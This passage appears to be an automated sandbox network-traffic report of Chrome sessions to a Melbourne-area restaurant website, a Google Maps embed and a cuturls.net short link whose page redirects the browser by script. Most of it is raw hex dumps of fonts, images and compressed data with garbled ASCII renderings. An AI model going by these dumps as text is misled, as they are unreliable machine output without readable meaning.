                                                                                                                                                    2024-10-01 04:27:01 UTC16384INData Raw: 1c 04 7b 94 4b 2e d4 cd 22 a0 9c 91 92 67 b4 49 7c ac 4e c7 53 7f fd 5a 2b 44 8d 96 65 01 07 d0 71 fd 52 c1 4d 42 c8 8a 1f 9e 48 7d 1e 84 30 65 1b 4a 2e 89 ee 19 65 8a 72 ed 4b ad 80 25 2c a6 28 0a a8 f9 dc 00 93 71 62 e2 e6 42 1b e3 aa b9 73 1a 1c a0 ca 96 1a 70 61 cd c0 63 34 3f 79 64 6a b3 36 fe 46 57 f3 83 01 b7 39 27 ec e0 da d1 d4 c5 e8 1e b0 d4 81 d3 91 51 13 e3 82 d4 01 7c 67 50 d4 f5 8e 0f f7 17 61 68 90 b3 1b 71 10 af 00 da 3d c0 eb 11 b8 a8 0f fa e6 5e 39 ff dd e0 5d a9 83 19 aa ce 14 42 55 98 55 a8 1a ae 97 57 88 ad eb 48 03 12 29 be 2e cb b2 03 14 1b fb ac 00 4b 85 90 b9 ae d3 75 b1 7a b9 d2 f2 fa 82 7a 3e 43 2f 17 d8 5c 30 cf 97 60 36 17 54 ab 50 5d 7c ae b7 7e 6e 26 35 50 68 30 b9 b4 b9 f4 c2 dc f5 56 9c 8d e1 ba 51 ce be 01 87 db 73 1c 2e
                                                                                                                                                    Data Ascii: {K."gI|NSZ+DeqRMBH}0eJ.erK%,(qbBspac4?ydj6FW9'Q|gPahq=^9]BUUWH).Kuzz>C/\0`6TP]|~n&5Ph0VQs.
                                                                                                                                                    2024-10-01 04:27:02 UTC16384INData Raw: 45 17 94 39 5c 94 69 c2 eb eb 39 0e 32 15 58 aa 6b 6f 5d 5f a1 f3 ec 59 b4 f5 74 bc 05 9b e0 07 67 49 6e c6 72 3c 7a 29 e9 b5 ba 86 9b 88 d0 29 4d f8 d3 cf 3f 21 1d 9f 71 98 9c 7d d8 0e 49 2d 58 3c e4 8c 9c 92 07 a9 c4 ee 64 38 a4 70 cf e7 33 58 0d a7 c3 11 fc a4 b0 b9 e0 b2 7c c5 f5 f5 8c f3 f9 8c 5f fe f2 67 00 c0 24 ec ac 38 33 63 8b ea 8c 5a 20 6f 83 40 46 64 61 0a 5a dd 35 db b8 b9 1d fa ee cb e4 fd b0 14 94 2b 90 84 a0 e2 79 4a 4a 86 03 fb 21 51 cc 05 9b 8d 14 8b 29 a8 2a 50 2b d2 02 d8 02 e8 ac d0 b9 82 96 28 5d 83 bb 07 46 f1 6c df e3 a9 01 08 d5 1a cd 09 a8 0a d2 70 73 8c 93 7d 03 2a 38 8c 4f c6 92 c8 11 24 1a 85 a1 5b a6 7b d0 f7 21 92 e8 ef ce 04 09 66 46 59 dc 58 02 cd 55 d2 d9 38 f3 e2 a5 e5 ce 1a 48 51 8a 5a 00 ad 26 4c 74 3a 4c 38 1d 26 07
                                                                                                                                                    Data Ascii: E9\i92Xko]_YtgInr<z))M?!q}I-X<d8p3X|_g$83cZ o@FdaZ5+yJJ!Q)*P+(]Flps}*8O$[{!fFYXU8HQZ&Lt:L8&
                                                                                                                                                    2024-10-01 04:27:02 UTC16336INData Raw: d5 70 5b 17 dc 7f fd 27 b4 d7 3f c1 6f 2f 30 2a 50 5b b1 30 43 06 53 9b 26 28 95 48 2e 36 83 b7 3b d9 7a 87 af 6f 09 84 68 4a cb 3c 1f 01 ac a8 05 13 ba e3 00 24 22 7c a9 0e 1b 2e 32 0b 6f bb 12 67 7c f7 11 b5 0e 37 82 e7 e5 57 f4 83 84 9f 36 c6 66 b3 94 bf e6 3c ad 1e 6c ae 01 c4 83 d2 b3 c3 29 fd c0 82 91 e2 88 e4 4d 70 85 11 41 10 f3 6d f7 02 f5 35 cf 71 8f b1 43 16 ac 3d 52 f4 2d 83 bc c3 d9 00 92 48 6e 8f cb 18 8d 30 1b 63 28 d3 7b 89 51 58 50 a5 40 ca d8 a8 ba b3 3a a9 70 00 84 e4 6e a6 04 57 90 85 ef a4 80 82 b5 48 04 82 44 73 86 08 0a f2 35 37 ed 37 18 ba 03 cd 80 9b 1a 16 03 56 87 eb 16 cf fa b1 a6 4f 39 98 76 25 f2 35 02 30 b3 e4 56 b2 13 59 18 2e 92 1b 5c 1d a6 86 75 55 f4 db 82 25 41 7c 66 46 9f 5e 71 bd 7c f1 fb 4f 5f e9 e9 e9 09 97 eb 15 cf
                                                                                                                                                    Data Ascii: p['?o/0*P[0CS&(H.6;zohJ<$"|.2og|7W6f<l)MpAm5qC=R-Hn0c({QXP@:pnWHDs577VO9v%50VY.\uU%A|fF^q|O_
                                                                                                                                                    2024-10-01 04:27:02 UTC48INData Raw: b2 60 be 7c 67 cc fc ce 7b e2 08 b6 8e cf 3f 58 61 5b 20 07 f6 bd f0 48 3e 5e 96 65 5c 2b 1a 6b cb 3c cf 21 bb fc f2 05 cf cf cf b8 3c 3f 83 92
                                                                                                                                                    Data Ascii: `|g{?Xa[ H>^e\+k<!<?
                                                                                                                                                    2024-10-01 04:27:02 UTC1485INData Raw: 59 3e 3c 78 c3 9d 4c 69 5c 4b cf fb eb 38 5e 8f 8f a7 a7 a7 58 b3 26 d9 52 ea 99 99 40 71 1e 7d 69 a0 6a b0 d2 c0 06 b0 db 16 4b 7d 9a af 8f fe a4 87 fb fc c8 12 8a 8d dc ee e7 38 98 f4 aa 8a ae 2d fd 4c ed b4 ee 95 4c 41 37 fb d8 0f 70 cc 37 cc 78 ef 83 77 bc 2e f4 a3 b9 36 53 bd 7d 5f 93 de ad 83 ef bd 4e 0f f3 fc 03 63 f1 90 aa fc 6e b3 99 58 cd f8 f9 c7 73 0f 3d 78 fd 1e de 6b 9e 1f 1f c4 30 e2 ef 7e ae c7 b9 99 52 72 7d 7c 5e ca f0 26 7a ac 6d b0 7f 7d 64 0d 7e e4 27 f6 37 3e b6 17 8b b4 f6 e8 cf 18 85 05 41 74 4d ce e3 b8 30 63 92 8a cb cc b8 a6 34 f9 49 26 cc 65 c1 2c 15 75 9a 50 4b 8d d6 a2 5a b2 72 2d 24 e1 ef d6 9c fd 73 cd 73 30 83 6b 6e fe 7b ef 60 12 a7 5a 69 9a a6 13 53 76 9a 26 b0 cf a8 a6 94 5e a7 20 2a 28 a5 78 29 05 28 05 9e b5 e1 60 b6
                                                                                                                                                    Data Ascii: Y><xLi\K8^X&R@q}ijK}8-LLA7p7xw.6S}_NcnXs=xk0~Rr}|^&zm}d~'7>AtM0c4I&e,uPKZr-$ss0kn{`ZiSv&^ *(x)(`


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    146192.168.2.449915142.250.186.684435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:27:01 UTC1066OUTGET /maps/embed?pb=!1m18!1m12!1m3!1d3144.533724303754!2d145.20973321518076!3d-37.988009579721194!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x6ad61409ac52d843%3A0xb215f2f86d8cc962!2sAfghan%20Rahimi%20Restaurant!5e0!3m2!1sen!2slk!4v1658071830116!5m2!1sen!2slk HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/hoursAndLocation
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:27:01 UTC739INHTTP/1.1 200 OK
                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-13A7h58UMN79ziKXoHT1BQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/geo-maps-api/1
                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                    X-Robots-Tag: noindex,nofollow
                                                                                                                                                    Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Vary: X-Origin
                                                                                                                                                    Vary: Referer
                                                                                                                                                    Date: Tue, 01 Oct 2024 04:27:01 GMT
                                                                                                                                                    Server: scaffolding on HTTPServer2
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                    Vary: Origin,Accept-Encoding
                                                                                                                                                    Connection: close
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    2024-10-01 04:27:01 UTC651INData Raw: 65 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 6d 61 70 44 69 76 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6d 61 70 44 69 76 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 31 33 41 37 68 35 38
                                                                                                                                                    Data Ascii: e48<!DOCTYPE html><html> <head> <style type="text/css"> html, body, #mapDiv { height: 100%; margin: 0; padding: 0; } </style> </head> <body> <div id="mapDiv"></div> <script nonce="13A7h58
                                                                                                                                                    2024-10-01 04:27:01 UTC1390INData Raw: 76 31 64 72 31 37 77 22 2c 6e 75 6c 6c 2c 5b 33 39 31 35 30 38 37 32 30 37 2c 31 34 35 32 31 31 39 31 38 39 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 67 63 69 64 3a 61 66 67 68 61 6e 69 5f 72 65 73 74 61 75 72 61 6e 74 22 5d 2c 30 2c 30 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 6e 75 6c 6c 2c 30 5d 5d 5d 5d 2c 6e 75 6c 6c 2c 5b 22 65 6e 22 2c 22 6c 6b 22 5d 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 2f 6d 61 70 73 2f 61 70 69 2f 6a 73 2f 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 69 63 65 2e 47 65 74 45 6e 74 69 74 79 44 65 74 61 69 6c 73 22 2c 22 2f 6d 61 70 73 2f 65 6d 62 65 64 2f 75 70 67 72 61 64 65 32 30 34 22 2c 6e 75 6c 6c
                                                                                                                                                    Data Ascii: v1dr17w",null,[3915087207,1452119189],null,null,null,null,null,null,null,null,null,null,"gcid:afghani_restaurant"],0,0,null,null,0,null,0]]]],null,["en","lk"],[null,null,null,"/maps/api/js/ApplicationService.GetEntityDetails","/maps/embed/upgrade204",null
                                                                                                                                                    2024-10-01 04:27:01 UTC1390INData Raw: 63 71 2d 79 49 41 78 58 50 67 5f 30 48 48 61 56 58 4e 59 67 51 38 42 63 49 41 69 67 41 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 22 74 65 6c 3a 2b 36 31 33 39 37 39 33 39 39 38 31 22 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 2c 5b 22 30 61 68 55 4b 45 77 6a 41 72 66 72 63 71 2d 79 49 41 78 58 50 67 5f 30 48 48 61 56 58 4e 59 67 51 71 74 4d 42 43 41 30 6f 43 67 22 2c 5b 22 34 52 4a 37 32 36 36 36 2b 51 51 22 5d 2c 5b 22 32 36 36 36 2b 51 51 20 44 61 6e 64 65 6e 6f 6e 67 2c 20 56 69 63 74 6f 72 69 61 2c 20 41 75 73 74 72 61 6c 69 61 22 5d 2c 33 5d 2c 5b 5b 5b 22 54 75 65 73 64 61 79 22 2c 32 2c 5b 32 30 32 34 2c 31 30 2c 31 5d 2c 5b 5b 22 35 e2 80 93 31 30 e2 80 af 50 4d 22 2c 5b 5b 31 37 5d 2c 5b 32 32 5d 5d 5d 5d 2c 30 2c 31 5d 2c 5b 22 57 65 64
                                                                                                                                                    Data Ascii: cq-yIAxXPg_0HHaVXNYgQ8BcIAigA",null,null,["tel:+61397939981"],null,null,null,1,["0ahUKEwjArfrcq-yIAxXPg_0HHaVXNYgQqtMBCA0oCg",["4RJ72666+QQ"],["2666+QQ Dandenong, Victoria, Australia"],3],[[["Tuesday",2,[2024,10,1],[["510PM",[[17],[22]]]],0,1],["Wed
                                                                                                                                                    2024-10-01 04:27:01 UTC232INData Raw: 3f 63 6c 69 65 6e 74 3d 67 6f 6f 67 6c 65 2d 6d 61 70 73 2d 65 6d 62 65 64 26 61 6d 70 3b 70 61 69 6e 74 5f 6f 72 69 67 69 6e 3d 26 61 6d 70 3b 6c 69 62 72 61 72 69 65 73 3d 67 65 6f 6d 65 74 72 79 2c 73 65 61 72 63 68 26 61 6d 70 3b 76 3d 77 65 65 6b 6c 79 26 61 6d 70 3b 6c 6f 61 64 69 6e 67 3d 61 73 79 6e 63 26 61 6d 70 3b 6c 61 6e 67 75 61 67 65 3d 65 6e 26 61 6d 70 3b 72 65 67 69 6f 6e 3d 6c 6b 26 61 6d 70 3b 63 61 6c 6c 62 61 63 6b 3d 6f 6e 41 70 69 4c 6f 61 64 22 20 6e 6f 6e 63 65 3d 22 31 33 41 37 68 35 38 55 4d 4e 37 39 7a 69 4b 58 6f 48 54 31 42 51 22 20 61 73 79 6e 63 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                    Data Ascii: ?client=google-maps-embed&amp;paint_origin=&amp;libraries=geometry,search&amp;v=weekly&amp;loading=async&amp;language=en&amp;region=lk&amp;callback=onApiLoad" nonce="13A7h58UMN79ziKXoHT1BQ" async defer></script> </body></html>
                                                                                                                                                    2024-10-01 04:27:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    147192.168.2.449917162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:27:02 UTC699OUTGET /assets/vendors/themify-icons/fonts/themify.woff?-fvbane HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Origin: https://www.afghanhayatrestaurant.com.au
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/vendors/themify-icons/css/themify-icons.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:27:02 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:27:02 GMT
                                                                                                                                                    content-type: font/woff
                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 56108
                                                                                                                                                    date: Tue, 01 Oct 2024 04:27:02 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:27:02 UTC16032INData Raw: 77 4f 46 46 4f 54 54 4f 00 00 db 2c 00 0a 00 00 00 00 da e4 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 46 46 20 00 00 00 f4 00 00 d2 34 00 00 d2 34 2d 2b 61 5e 4f 53 2f 32 00 00 d3 28 00 00 00 60 00 00 00 60 08 22 fe 15 63 6d 61 70 00 00 d3 88 00 00 00 4c 00 00 00 4c 1a 55 cd b6 67 61 73 70 00 00 d3 d4 00 00 00 08 00 00 00 08 00 00 00 10 68 65 61 64 00 00 d3 dc 00 00 00 36 00 00 00 36 00 69 e5 fd 68 68 65 61 00 00 d4 14 00 00 00 24 00 00 00 24 03 e3 03 3c 68 6d 74 78 00 00 d4 38 00 00 05 90 00 00 05 90 c1 05 27 54 6d 61 78 70 00 00 d9 c8 00 00 00 06 00 00 00 06 01 64 50 00 6e 61 6d 65 00 00 d9 d0 00 00 01 39 00 00 01 39 55 0c ad e2 70 6f 73 74 00 00 db 0c 00 00 00 20 00 00 00 20 00 03 00 00 01 00 04 04 00 01 01 01 08 74 68
                                                                                                                                                    Data Ascii: wOFFOTTO,CFF 44-+a^OS/2(``"cmapLLUgasphead66ihhea$$<hmtx8'TmaxpdPname99Upost th
                                                                                                                                                    2024-10-01 04:27:02 UTC16384INData Raw: aa 86 a9 82 a8 08 da 8b 05 9a 70 93 6c 8e 6b 08 31 8b 05 b8 f7 0d 15 44 8b 05 7f a7 7b a6 78 a5 bb 7d b4 6e a8 65 08 fb 38 e4 15 a4 70 9f 6d 9a 6b 08 fb 2e 8b 05 9a ab 9f a9 a3 a6 91 8b 91 8c 91 8b 91 8b 91 8a 90 8b 08 3a 82 15 78 72 7c 70 7f 6f 08 45 8b 05 a8 b1 b3 a8 ba 98 08 fb 08 fb f4 15 d1 8b 05 97 6f 9b 70 9e 71 5c 99 62 a8 6e b1 08 f7 37 32 15 72 a6 77 a9 7c ab 08 f7 2e 8b 05 7c 6b 77 6d 72 70 86 8b 85 8a 85 8b 85 8b 86 8c 85 8b 08 db 93 15 9e a4 9b a7 97 a7 08 d2 8b 05 6e 65 62 6e 5b 7d 08 0e f7 dc e8 15 a9 85 05 7c 45 4e 5a 44 8b 38 8b 47 cf 8b de 8b cf b9 c7 cd 9c 08 93 6e 05 56 7d 66 5b 8b 55 8b 48 c1 55 ce 8b c4 8b bb b2 97 c3 08 f7 2e 47 15 8b 6c 53 8b 6e f7 10 fb 4e 8b 7b f7 88 05 72 92 78 a2 8b a7 8b ac a6 a6 ac 8b ac 8b a6 70 8b 6a 8b 6f
                                                                                                                                                    Data Ascii: plk1D{x}ne8pmk.:xr|poEopq\bn72rw|.|kwmrpnebn[}|ENZD8GnV}f[UHU.GlSnN{rxpjo
                                                                                                                                                    2024-10-01 04:27:02 UTC16384INData Raw: 8b 8b c7 a9 8b 8b 4f c7 8b 8b 6d 4f 8b 8b 4f 6d 8b 8b c7 05 0e f8 94 f7 0d 15 8b ab 71 a4 6c 8b 08 fb 19 8b b1 f7 1c 8c f5 05 8b ac 6f a6 6b 8b 08 31 8b 05 6a 8b 70 70 8b 6a 08 8b 26 b1 fb 21 fb 18 8b 05 6c 8b 71 72 8b 6b 08 8b fb 0f a9 8b 8b 6d f8 58 8b 8b a9 a9 8b 8b f7 0f 05 6d 2e 15 fc 58 8b 8b e8 05 8b 9a 97 97 9a 8b 08 f7 40 8b 5b f7 41 8b ee 05 8b 9b 99 99 9b 8b 08 e5 8b 05 9b 8b 99 7d 8b 7b 08 8b 27 5b fb 40 f7 40 8b 05 9a 8b 97 7f 8b 7c 08 8b 2e 05 0e f7 35 f7 c4 15 3c 3b da 3b 76 76 26 f0 f0 f0 a0 76 05 f7 67 a0 15 76 76 da 3b 3c 3b a0 76 f0 f0 26 f0 05 fb 17 fb f9 15 a9 8b 8b f8 94 6d 8b 8b fc 94 05 0e f8 87 f8 00 15 61 b6 05 7a 9c 6d 8b 7a 7a 08 fc 0f fc 10 f7 37 8b cd cd a4 73 f7 7b f7 7b 05 93 94 90 96 8b 97 8b 97 86 97 83 93 08 fb bb fb 51
                                                                                                                                                    Data Ascii: OmOOmqlok1jppj&!lqrkmXm.X@[A}{'[@@|.5<;;vv&vgvv;<;v&mazmzz7s{{Q
                                                                                                                                                    2024-10-01 04:27:02 UTC7308INData Raw: 77 a4 8b 08 f8 3a 8b 05 a4 8b 9f 9f 8b a4 08 8b f8 13 36 df 05 fb 4e 6d 15 8b fb 0d e5 8b 8b f7 0d a9 8b 8b fb 2b fb 85 8b 8b f7 2b f7 0d 8b 05 fb 2b fc 58 15 8b f7 49 f7 e0 8b 8b fb 49 fb e0 8b 05 f8 1c 9a 15 8b 83 84 84 83 8b 08 7c 8b 8b f7 67 fc 1c 8b 8b fb 67 7c 8b 05 83 8b 84 92 8b 93 08 8b f8 3a 05 8b 93 92 92 93 8b 08 b8 8b 8b fb 49 f7 c2 8b 8b f7 49 a1 8b cf 49 8b fc 07 05 0e f8 67 f8 74 15 fc 12 8b 36 37 8b fc 13 05 8b 72 9f 77 a4 8b 08 f8 3a 8b 05 a4 8b 9f 9f 8b a4 08 8b f8 3a 05 8b a4 77 9f 72 8b 08 40 6d 15 8b 4f fb 85 8b 8b c7 f7 85 8b 05 fb c2 fc 58 15 8b a9 f7 e0 8b 8b 6d fb e0 8b 05 f8 1c 9a 15 8b 83 84 84 83 8b 08 7c 8b 8b c7 fc 1c 8b 8b 4f 7c 8b 05 83 8b 84 92 8b 93 08 8b f8 07 cf cd a1 8b 8b 31 f7 c2 8b 8b e5 b8 8b 05 93 8b 92 84 8b 83
                                                                                                                                                    Data Ascii: w:6Nm+++XII|gg|:IIIgt67rw::wr@mOXm|O|1


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    148192.168.2.44991869.162.95.44435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:27:02 UTC391OUTGET /eWD0j3 HTTP/1.1
                                                                                                                                                    Host: cuturls.net
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: sid=531b57b9-7fad-11ef-9455-174eec4a577f
                                                                                                                                                    2024-10-01 04:27:02 UTC292INHTTP/1.1 200 OK
                                                                                                                                                    accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                    cache-control: max-age=0, private, must-revalidate
                                                                                                                                                    connection: close
                                                                                                                                                    content-length: 479
                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                    date: Tue, 01 Oct 2024 04:27:02 GMT
                                                                                                                                                    server: Cowboy
                                                                                                                                                    2024-10-01 04:27:02 UTC479INData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 73 3a 2f 2f 63 75 74 75 72 6c 73 2e 6e 65 74 2f 65 57 44 30 6a 33 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 7a 63 32 4e 44 41 79 4d 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 33 4e 7a 55 32 4f 44 49 79 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62
                                                                                                                                                    Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('https://cuturls.net/eWD0j3?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNzc2NDAyMiwiaWF0IjoxNzI3NzU2ODIyLCJpc3MiOiJKb


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    149192.168.2.449919162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:27:02 UTC380OUTGET /assets/imgs/header_2.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:27:02 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:27:02 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:20 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 206109
                                                                                                                                                    date: Tue, 01 Oct 2024 04:27:02 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:27:02 UTC16030INData Raw: ff d8 ff e1 18 35 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 02 e8 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 37 3a 33 37 3a 31 32 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: 5ExifMM*@(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 17:37:12
